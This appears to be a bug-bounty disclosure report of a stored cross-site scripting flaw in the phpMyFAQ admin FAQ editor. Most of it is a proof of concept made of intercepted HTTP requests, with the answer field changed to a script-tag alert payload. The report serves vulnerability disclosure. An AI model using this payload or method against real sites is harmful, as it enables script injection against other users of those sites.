Stored Cross Site Scripting at FAQ Answer

Reported by choocs on huntr.dev (www.huntr.dev)
Published: 2023-04-10 10:21:05
Report ID: EFDF5B24-6D30-4D57-A5B0-13B253BA3EA4
Tags: cross-site scripting, injection, web application, security flaw, browser side script, request interception, malicious code, user input, output validation, encoding, form data, cookie, proof of concept

EPSS: 0.001 (Low), percentile 29.7%

Description

Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. An XSS attack occurs when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. Flaws that allow these attacks to succeed are widespread and occur anywhere a web application includes user-supplied input in the output it generates without validating or encoding it.

Proof of Concept

Step 1: Go to Add New FAQ

Step 2: Add a FAQ

Step 3: Intercept the request

Original Request

POST /phpMyFAQ/phpmyfaq/admin/?action=saveentry&id=8 HTTP/1.1
Host: <DOMAIN>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 386
Origin: http://<DOMAIN>
Connection: close
Referer: http://<DOMAIN>/phpMyFAQ/phpmyfaq/admin/?action=editentry&id=8&lang=en
Cookie: pmf-csrf-token-4236a440a6=48fedc6db5f435fce1d85cfe3d3b1b70; pmf-csrf-token-43e075fa5c=b2ad7a1b9639067104816a3f7b2a30cd; pmf-csrf-token-bdeef9669c=96ee73555ec14bc08d8cc141f4a11fd3; pmf-csrf-token-b3e2016b52=f42fb10e3373e12018e31e160d6cf1a6; pmf_sid=13; phpmyfaq-setup=ckikio51e03n7njerqhffb0vr3; PHPSESSID=9maq1bft6opr9q02k7ft2v7qtb; phpmyfaq_cc_cookie={"categories":["necessary"],"level":["necessary"],"revision":0,"data":null,"rfc_cookie":false,"consent_date":"2023-04-10T08:02:28.700Z","consent_uuid":"88b3118d-69c6-41cb-bc18-18dca9e1ef90","last_consent_update":"2023-04-10T08:02:28.700Z"}
Upgrade-Insecure-Requests: 1

revision_id=0&record_id=8&openQuestionId=0&notifyUser=&notifyEmail=&pmf-csrf-token=3420181b6866cebb57dc3ad92503fdb3&question=test&answer=%3Cp%3Etest%3C%2Fp%3E&rubrik%5B%5D=1&lang=en&tags=&keywords=&author=admin&email=admin%40admin.com&grouppermission=all&userpermission=all&restricted_users=1&changed=&notes=&recordDateHandling=on&date=&active=yes&revision=no&comment=y&solution_id=1007

The answer parameter carries the FAQ body as URL-encoded HTML: answer=%3Cp%3Etest%3C%2Fp%3E (that is, <p>test</p>).

Change the value of the answer parameter to <script>alert(document.domain)</script>.

Edited Request

POST /phpMyFAQ/phpmyfaq/admin/?action=saveentry&id=8 HTTP/1.1
Host: <DOMAIN>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 404
Origin: http://<DOMAIN>
Connection: close
Referer: http://<DOMAIN>/phpMyFAQ/phpmyfaq/admin/?action=editentry&id=8&lang=en
Cookie: pmf-csrf-token-4236a440a6=48fedc6db5f435fce1d85cfe3d3b1b70; pmf-csrf-token-43e075fa5c=b2ad7a1b9639067104816a3f7b2a30cd; pmf-csrf-token-bdeef9669c=96ee73555ec14bc08d8cc141f4a11fd3; pmf-csrf-token-b3e2016b52=f42fb10e3373e12018e31e160d6cf1a6; pmf_sid=13; phpmyfaq-setup=ckikio51e03n7njerqhffb0vr3; PHPSESSID=9maq1bft6opr9q02k7ft2v7qtb; phpmyfaq_cc_cookie={"categories":["necessary"],"level":["necessary"],"revision":0,"data":null,"rfc_cookie":false,"consent_date":"2023-04-10T08:02:28.700Z","consent_uuid":"88b3118d-69c6-41cb-bc18-18dca9e1ef90","last_consent_update":"2023-04-10T08:02:28.700Z"}
Upgrade-Insecure-Requests: 1

revision_id=0&record_id=8&openQuestionId=0&notifyUser=&notifyEmail=&pmf-csrf-token=3420181b6866cebb57dc3ad92503fdb3&question=test&answer=<script>alert(document.domain)</script>&rubrik%5B%5D=1&lang=en&tags=&keywords=&author=admin&email=admin%40admin.com&grouppermission=all&userpermission=all&restricted_users=1&changed=&notes=&recordDateHandling=on&date=&active=yes&revision=no&comment=y&solution_id=1007

Step 4: Forward the FAQ request

Step 5: Go to the FAQ page

Step 6: XSS Triggered!
